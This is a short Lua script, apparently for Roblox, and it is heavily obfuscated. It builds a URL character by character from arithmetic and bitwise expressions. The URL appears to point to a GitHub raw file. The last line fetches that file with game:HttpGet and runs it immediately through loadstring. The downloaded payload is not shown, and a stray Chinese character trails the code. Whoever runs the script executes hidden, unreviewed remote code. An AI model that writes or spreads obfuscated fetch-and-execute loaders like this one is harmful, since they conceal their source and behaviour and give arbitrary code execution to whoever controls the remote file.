local obf_bitlib = bit32 or bit;

local obf_XOR = obf_bitlib.bxor;

local obf_OR = obf_bitlib.bor;

local obf_AND = obf_bitlib.band;

local TABLE_TableIndirection = {};

TABLE_TableIndirection["obf_bitlib%0"] = bit32 or bit;

TABLE_TableIndirection["obf_XOR%0"] = TABLE_TableIndirection["obf_bitlib%0"].bxor;

TABLE_TableIndirection["obf_OR%0"] = TABLE_TableIndirection["obf_bitlib%0"].bor;

TABLE_TableIndirection["obf_AND%0"] = TABLE_TableIndirection["obf_bitlib%0"].band;

TABLE_TableIndirection["v0%0"] = {[2 - 1]=tostring(utf8.char((function()

	return table.unpack({104,(735 - (555 + 64)),(684 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](367, 201), TABLE_TableIndirection["obf_OR%0"](367, 201)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](367, 201), TABLE_TableIndirection["obf_OR%0"](367, 201)))),112,(obf_AND(TABLE_TableIndirection["obf_AND%0"](19, 96), TABLE_TableIndirection["obf_OR%0"](19, 96)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](19, 96), TABLE_TableIndirection["obf_OR%0"](19, 96))),58,(1684 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](1523, 114), TABLE_TableIndirection["obf_OR%0"](1523, 114)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](1523, 114), TABLE_TableIndirection["obf_OR%0"](1523, 114)))),47,(162 - 48),(1367 - (obf_AND(226, 1044) + obf_OR(226, 1044))),119,(163 - (TABLE_TableIndirection["obf_AND%0"](32, 85) + TABLE_TableIndirection["obf_OR%0"](32, 85))),(obf_AND(23, 80) + obf_OR(23, 80)),(250 - 145),(212 - 96),(454 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](87, 263), TABLE_TableIndirection["obf_OR%0"](87, 263)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](87, 263), TABLE_TableIndirection["obf_OR%0"](87, 263)))),(297 - (67 + 113)),(240 - 142),(465 - 348),115,(182 - 81),(1111 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](915, 82), TABLE_TableIndirection["obf_OR%0"](915, 82)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](915, 82), TABLE_TableIndirection["obf_OR%0"](915, 82)))),(obf_AND(TABLE_TableIndirection["obf_AND%0"](58, 41), TABLE_TableIndirection["obf_OR%0"](58, 41)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](58, 41), TABLE_TableIndirection["obf_OR%0"](58, 41))),(1298 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](1069, 118), TABLE_TableIndirection["obf_OR%0"](1069, 118)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](1069, 118), TABLE_TableIndirection["obf_OR%0"](1069, 118)))),(240 - 130),(205 - 89),(892 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](368, 423), TABLE_TableIndirection["obf_OR%0"](368, 423)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](368, 423), TABLE_TableIndirection["obf_OR%0"](368, 423)))),(128 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](10, 8), TABLE_TableIndirection["obf_OR%0"](10, 8)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](10, 8), TABLE_TableIndirection["obf_OR%0"](10, 8)))),116,46,99,(553 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](416, 26), TABLE_TableIndirection["obf_OR%0"](416, 26)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](416, 26), TABLE_TableIndirection["obf_OR%0"](416, 26)))),(TABLE_TableIndirection["obf_AND%0"](47, 62) + TABLE_TableIndirection["obf_OR%0"](47, 62)),47,87,83,(TABLE_TableIndirection["obf_AND%0"](18, 38) + TABLE_TableIndirection["obf_OR%0"](18, 38)),(obf_AND(TABLE_TableIndirection["obf_AND%0"](44, 9), TABLE_TableIndirection["obf_OR%0"](44, 9)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](44, 9), TABLE_TableIndirection["obf_OR%0"](44, 9))),(827 - (TABLE_TableIndirection["obf_AND%0"](201, 571) + TABLE_TableIndirection["obf_OR%0"](201, 571))),(237 - 180),54,(170 - 122),(115 - 68),(obf_AND(3, 42) + obf_OR(3, 42)),(obf_AND(TABLE_TableIndirection["obf_AND%0"](17, 30), TABLE_TableIndirection["obf_OR%0"](17, 30)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](17, 30), TABLE_TableIndirection["obf_OR%0"](17, 30))),(994 - (TABLE_TableIndirection["obf_AND%0"](261, 624) + TABLE_TableIndirection["obf_OR%0"](261, 624))),97,(1185 - (obf_AND(1020, 60) + obf_OR(1020, 60))),(372 - 262),47,(obf_AND(15, 22) + obf_OR(15, 22)),(1816 - (obf_AND(760, 987) + obf_OR(760, 987))),56,37,56,(obf_AND(18, 34) + obf_OR(18, 34)),(145 - 108),(obf_AND(TABLE_TableIndirection["obf_AND%0"](1, 56), TABLE_TableIndirection["obf_OR%0"](1, 56)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](1, 56), TABLE_TableIndirection["obf_OR%0"](1, 56))),(obf_AND(TABLE_TableIndirection["obf_AND%0"](52, 13), TABLE_TableIndirection["obf_OR%0"](52, 13)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](52, 13), TABLE_TableIndirection["obf_OR%0"](52, 13))),(162 - 125),69,54,(83 - 46),(155 - 98),(1884 - (TABLE_TableIndirection["obf_AND%0"](1703, 114) + TABLE_TableIndirection["obf_OR%0"](1703, 114))),37,65,(206 - 139),(81 - 44),(83 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](9, 5), TABLE_TableIndirection["obf_OR%0"](9, 5)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](9, 5), TABLE_TableIndirection["obf_OR%0"](9, 5)))),55,37,(1330 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](243, 1022), TABLE_TableIndirection["obf_OR%0"](243, 1022)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](243, 1022), TABLE_TableIndirection["obf_OR%0"](243, 1022)))),67,(1217 - (obf_AND(1123, 57) + obf_OR(1123, 57))),(319 - (163 + 91)),(1997 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](1869, 61), TABLE_TableIndirection["obf_OR%0"](1869, 61)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](1869, 61), TABLE_TableIndirection["obf_OR%0"](1869, 61)))),37,69,52,(obf_AND(TABLE_TableIndirection["obf_AND%0"](6, 31), TABLE_TableIndirection["obf_OR%0"](6, 31)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](6, 31), TABLE_TableIndirection["obf_OR%0"](6, 31))),(TABLE_TableIndirection["obf_AND%0"](62, 4) + TABLE_TableIndirection["obf_OR%0"](62, 4)),(1036 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](140, 831), TABLE_TableIndirection["obf_OR%0"](140, 831)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](140, 831), TABLE_TableIndirection["obf_OR%0"](140, 831)))),(755 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](15, 703), TABLE_TableIndirection["obf_OR%0"](15, 703)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](15, 703), TABLE_TableIndirection["obf_OR%0"](15, 703)))),(494 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](262, 176), TABLE_TableIndirection["obf_OR%0"](262, 176)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](262, 176), TABLE_TableIndirection["obf_OR%0"](262, 176)))),(755 - (TABLE_TableIndirection["obf_AND%0"](198, 490) + TABLE_TableIndirection["obf_OR%0"](198, 490))),(163 - 126),(165 - 96),(110 - 57),37,66,(162 - 113),(183 - 146),56,50,(obf_AND(TABLE_TableIndirection["obf_AND%0"](17, 20), TABLE_TableIndirection["obf_OR%0"](17, 20)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](17, 20), TABLE_TableIndirection["obf_OR%0"](17, 20))),(obf_AND(TABLE_TableIndirection["obf_AND%0"](9, 60), TABLE_TableIndirection["obf_OR%0"](9, 60)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](9, 60), TABLE_TableIndirection["obf_OR%0"](9, 60))),(255 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](14, 188), TABLE_TableIndirection["obf_OR%0"](14, 188)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](14, 188), TABLE_TableIndirection["obf_OR%0"](14, 188)))),37,56,(obf_AND(TABLE_TableIndirection["obf_AND%0"](63, 2), TABLE_TableIndirection["obf_OR%0"](63, 2)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](63, 2), TABLE_TableIndirection["obf_OR%0"](63, 2))),(58 - 21),(182 - 117),(obf_AND(31, 17) + obf_OR(31, 17)),(433 - (obf_AND(TABLE_TableIndirection["obf_AND%0"](115, 281), TABLE_TableIndirection["obf_OR%0"](115, 281)) + obf_OR(TABLE_TableIndirection["obf_AND%0"](115, 281), TABLE_TableIndirection["obf_OR%0"](115, 281)))),69,53,37,(238 - 173),70,(51 - 14),56,(1719 - (970 + 695))});

end)()))};

loadstring(game:HttpGet(TABLE_TableIndirection["v0%0"][1]))();

的
